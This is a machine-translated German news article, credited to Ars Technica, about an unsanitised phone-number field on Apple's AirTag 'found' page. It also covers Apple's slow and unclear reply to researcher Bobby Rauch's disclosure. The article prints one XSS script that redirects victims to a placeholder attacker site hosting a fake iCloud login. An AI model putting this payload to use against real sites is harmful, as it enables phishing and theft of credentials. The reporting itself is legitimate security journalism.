Apple hat vergessen, das Telefonnummernfeld für verlorene AirTags zu desinfizieren

Vergrößern / Apples AirTags – wie oben an einem Rucksack befestigt – ermöglichen es Benutzern, ihr eigenes Gerät über die erneute Standortübertragung von anderen Apple-Benutzern zu finden. Wenn alles andere fehlschlägt, kann der Benutzer einen “Verloren-Modus” aktivieren, der seine Telefonnummer anzeigen soll, wenn ein Finder den fehlenden AirTag scannt.

Die Treffer kommen immer wieder zu Apples Bug-Bounty-Programm, von dem Sicherheitsforscher sagen, dass es langsam und inkonsistent ist, um auf seine Schwachstellenberichte zu reagieren.

Diesmal ist die vuln des tages ist darauf zurückzuführen, dass ein Benutzereingabefeld nicht bereinigt wurde – insbesondere das Telefonnummernfeld, das AirTag-Besitzer verwenden, um ihre verlorenen Geräte zu identifizieren.

Der barmherzige Samariter-Angriff

AirTags sind winzige, knopfähnliche Geräte, die mit Gravur personalisiert und an leicht verlorenen Geräten entweder direkt oder über . befestigt werden können
Vergrößern / AirTags sind winzige, knopfähnliche Geräte, die mit Gravur personalisiert und an leicht verlorenen Geräten entweder direkt oder über “Schlaufen” -Halter befestigt werden können.

Sicherheitsberater und Penetrationstester Bobby Rauch hat herausgefunden, dass Apples AirTags– Winzige Geräte, die an häufig verlorenen Gegenständen wie Laptops, Telefonen oder Autoschlüsseln angebracht werden können, bereinigen keine Benutzereingaben. Dieses Versehen öffnet die Tür für die Verwendung von AirTags in a Drop-Angriff. Anstatt den Parkplatz eines Ziels mit mit Malware geladenen USB-Laufwerken zu beladen, kann ein Angreifer einen böswillig vorbereiteten AirTag ablegen.

Diese Art von Angriff erfordert nicht viel technologisches Know-how – der Angreifer gibt einfach gültiges XSS in das Telefonnummernfeld des AirTag ein, versetzt den AirTag dann in den Modus „Verloren“ und legt ihn an einer Stelle ab, die das Ziel wahrscheinlich findet. Theoretisch ist das Scannen eines verlorenen AirTags eine sichere Aktion – es soll nur eine Webseite unter https://found.apple.com/ erscheinen. Das Problem ist, dass found.apple.com bettet dann den Inhalt des Telefonnummernfelds in die Website ein, wie er im Browser des Opfers angezeigt wird, unbereinigt.

Die offensichtlichste Möglichkeit, diese Schwachstelle auszunutzen, besteht laut Rauch darin, einfaches XSS zu verwenden, um einen gefälschten iCloud-Anmeldedialog auf dem Telefon des Opfers anzuzeigen. Dies erfordert nicht viel Code:

<script>window.location='https://path/to/badsite.tld/page.html';var a="";</script>

Wenn found.apple.com bettet das obige XSS unschuldig in die Antwort für einen gescannten AirTag ein, das Opfer erhält ein Popup-Fenster, das den Inhalt von . anzeigt badside.tld/page.html. Dies kann ein Zero-Day-Exploit für den Browser oder einfach ein Phishing-Dialog sein. Rauch vermutet einen gefälschten iCloud-Anmeldedialog, der so gestaltet werden kann, dass er wie der echte aussieht – der aber stattdessen die Apple-Anmeldeinformationen des Opfers auf dem Server des Ziels ablegt.

Obwohl dies ein überzeugender Exploit ist, ist es bei weitem nicht der einzige verfügbare – so ziemlich alles, was Sie mit einer Webseite machen können, ist auf dem Tisch und verfügbar. Das reicht von einfachem Phishing, wie im obigen Beispiel, bis hin zum Aussetzen des Telefons des Opfers einer Zero-Day-No-Click-Browser-Schwachstelle.

Weitere technische Details – und einfache Videos, die sowohl die Schwachstelle als auch die Netzwerkaktivität zeigen, die durch Rauchs Exploit der Schwachstelle ausgelöst wurde – sind bei Rauch öffentlich verfügbar Offenlegung auf Mittel.

Diese öffentliche Offenlegung von Apple

Laut Bericht von Krebs über Sicherheit, gibt Rauch die Schwachstelle öffentlich bekannt, die hauptsächlich auf Kommunikationsfehler von Apple zurückzuführen ist – ein immer häufiger vorkommender Refrain.

Rauch sagte Krebs, dass er die Sicherheitsanfälligkeit am 20. Juni zunächst privat gegenüber Apple offengelegt habe, aber drei Monate lang würde ihm das Unternehmen nur sagen, dass es “noch untersucht wird”. Dies ist eine seltsame Reaktion auf einen scheinbar extrem einfachen Fehler, der zu überprüfen und abzuschwächen ist. Am vergangenen Donnerstag schickte Apple Rauch eine E-Mail, um zu sagen, dass die Schwachstelle in einem kommenden Update behoben werde, und bat ihn, in der Zwischenzeit nicht öffentlich darüber zu sprechen.

Apple hat nie auf grundlegende Fragen geantwortet, die Rauch gestellt hat, wie zum Beispiel, ob es einen Zeitplan für die Behebung des Fehlers gibt, ob ihm der Bericht gutgeschrieben werden soll und ob er für ein Kopfgeld in Frage kommt. Die fehlende Kommunikation aus Cupertino veranlasste Rauch zu gehen öffentlich auf Medium, obwohl Apple von den Forschern verlangt, ihre Entdeckungen zu verschweigen, wenn sie eine Anerkennung und/oder eine Vergütung für ihre Arbeit wünschen.

Rauch drückte seine Bereitschaft aus, mit Apple zusammenzuarbeiten, bat das Unternehmen jedoch, “einige Details anzugeben, wann Sie dies beheben möchten und ob es eine Anerkennung oder eine Bug-Bounty-Auszahlung geben würde”. Er warnte das Unternehmen auch davor, in 90 Tagen zu veröffentlichen. Rauch sagt, dass Apples Antwort war: “Im Grunde würden wir es begrüßen, wenn Sie dies nicht durchsickern lassen.”

Wir haben Apple um einen Kommentar gebeten und werden hier mit jeder Antwort aktualisieren.


Source: Ars Technica by arstechnica.com.

*The article has been translated based on the content of Ars Technica by arstechnica.com. If there is any problem regarding the content, copyright, please leave a report below the article. We will try to process as quickly as possible to protect the rights of the author. Thank you very much!

*We just want readers to access information more quickly and easily with other multilingual content, instead of information only available in a certain language.

*We always respect the copyright of the content of the author and always include the original link of the source article.If the author disagrees, just leave the report below the article, the article will be edited or deleted at the request of the author. Thanks very much! Best regards!